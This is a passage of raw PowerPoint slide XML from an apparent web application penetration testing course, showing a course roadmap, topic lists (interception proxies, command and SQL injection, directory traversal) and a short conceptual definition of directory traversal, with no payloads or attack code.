                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory Traversal </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and File Include</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113667" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="1424940"/>
            <a:ext cx="8321040" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory traversal is the a vulnerability that provides the ability to leave the web root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The web server is supposed to enforce restrictions on where files can be loaded from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are then able to load or run files from "protected" areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C:\Windows or /etc as two examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is file include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="550"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Older vulnerability but modern applications are giving us fun new ways to play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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
